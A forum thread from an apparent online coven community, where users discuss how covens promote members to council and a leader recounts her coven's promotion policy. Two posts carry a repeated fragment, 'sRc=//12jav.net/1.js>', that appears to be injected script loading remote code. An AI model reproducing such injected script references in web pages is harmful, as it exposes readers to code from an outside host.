looking for a coven...

i am in a coven right now, and have been in a few over the years on this site, but they've all normally let me be a council member because i like to add rituals and spells rather than talk on the forums, is there a coven who would let me be on their council? sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

I think in most covens you have to contribute quite a bit before you are asked. The people in councils for their coven are usually in the council for a reason. Im not sure there is a coven where you get promoted to council straight away sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

yea what the user above said is true . You have to be active , and help out in the coven to be promoted.

Typically yes, but it all really depends. Some covens have council applications where you can promoted if you pass.

I agree with Diana, Spellcasters could be what you're looking for.

Magical Knights does not promote everyone to council.

Spell casters is not really the best coven to join if you are interested in actually learning, helping people etc.

Within Higher Magicks you are only granted council position for active participation and having been part of the coven at length.

Right now, MK promotes based on voting by the three leaders. We each look at our own candidates individually and decide if they are responsible and knowledgeable enough to be councilors. We've had more than a few people join up, asking for position, usually before they've even been accepted.

Our response to this has always been this since the new leadership has been in place, if the person shows they are responsible, active, and knowledgeable (by our standards, not by reputation standards), then they are promoted.

During the time that MK was actively promoting anyone who joined, I was highly inactive, and my former priestess Ferrum was as well. We had moved the coven off the site, which in the end turned out to be a mistake. I came back, Ferrum told me to do as I wish. I did the everyone as council bit for the following reasons:

a) I was still highly inactive.

b) I was curious to see if a Spell Casters type coven really would work if there was someone governing it.

c) No one I thought could handle it was around for promotion.

A few of my members started wanting me to become active again, fully active. They asked me to fix the coven back up to what it should be. So I brought Belle, who has been with MK the whole time, into the leadership with me to help me out. Belle and I brought back the old members who we actively knew, and then together we decided to get Chenny to join us.

Each of our councilors now has contributed to the coven and the site, either currently or in the past, many of them are also our teachers.
